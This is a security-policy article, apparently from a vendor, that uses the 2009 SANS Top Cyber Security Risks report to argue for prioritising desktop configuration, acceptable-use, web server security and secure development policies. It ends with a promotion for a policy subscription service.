Is it possible to declare some security policies as more critical than others? When it comes to protecting sensitive data, all security policies are important to reduce the risk of loss. However, when we look at risk mitigation from the perspective of stopping the latest attacks, some security controls rise to the top.
In September 2009 the SANS Institute released the latest version of the Top Cyber Security Risks. This analysis is based on real-world data collected from thousands of organizations. One of the objectives is to help understand the most dangerous attacks and how they happen. Based on the SANS analysis, we can highlight some of the critical information security policies that every organization should have.
Desktop Configuration Management Policies
The first step in the attack against most enterprises is the exploitation of an application running on the user desktop. Common applications are Adobe Acrobat, Flash and Microsoft Office. In short, these are the applications that many internet users use on a regular basis. Research from the SANS report suggests that IT groups are much more adept at patching servers than desktops. This makes sense, given the large and growing numbers of “end user’ devices that access email and the internet.
Desktop/Laptop Configuration Security Policies would clearly rise near the top of any prioritized list of security policies. This type of policy addresses controls that help create and manage a secure “footprint” on end-user machines. These involve a combination of both management and technical controls, including remote scanning and management of user desktops, as well as acceptable-use policies limiting what the user can download on their machine. It may also limit the ability for users to make changes to machine configurations, including updates to security settings. While in some cases these features can be automated by technology, it is still important to document these requirements in written policies. An effective Configuration Security Policy addresses the entire lifecycle of end-user equipment.
Internet and Email Acceptable Use
The second phase of an exploit involving a vulnerable machine is the user downloading an infected document. In some cases, a user would only have to visit an infected web site (see the next policy) to be exploited. However, a majority of cases still involve the distribution of infected files via email or downloads.
Internet Acceptable Use Security Policies are critical to make users aware of safe internet practices and educate them on the type of attacks that they face. Acceptable Use policies can involve a variety of controls, including limits on the type of web sites that can be visited, the duration of time spent on web activities, restrictions on software downloads, and limits on the type of software that can be used to access internet-services. For example, uncontrolled use of Peer-to-Peer (P2P) networking software has lead to a number of high-provide breaches of confidential information. Email Acceptable Use Policies are closely related and can be combined with Internet Acceptable Use policies to help reduce this risk of users making critical information security mistakes.
Web Server Security
Various forms of technical attacks against web servers are creating a growing network of infected web sites that can be used to distribute malicious software to users. By the far the most common are variations of the SQL Injection attack against web-database applications. These attacks are particularly damaging since a legitimate web site becomes an accomplice in infecting real business users of the site.
To help protect against these attacks, as well as against other potential data loss through the web, every organization should have a Web Site Security Policy. Based on our research, very few organizations have such a formal policy. A look at information security frameworks such as ISO 27002, HIPAA and NIST SP 800-53 reveal that web site security not a major focus, and certainly not called out as a key control.
A related and equally critical policy would be a Secure Application Development Policy. This policy would define various controls for designing, developing and deploying security applications. While this is a key requirement of PCI-DSS version 1.2, the rampant growth of web application exploits indicated that secure application development must be part of any organization that manages a dynamic web site that accesses a database.
Keeping Security Policies Up to Date
The evolving nature of these top threats points to the need for information security and data privacy policies to be updated on a periodic basis. Information Shield has developed our PolicyShield Security Policy Subscription to address this critical business need. PolicyShield subscribers will find all of the sample documents mentioned in this article as part of their standard subscription. Each quarter, we update the subscription with new policies that help you stay protected against the latest threats.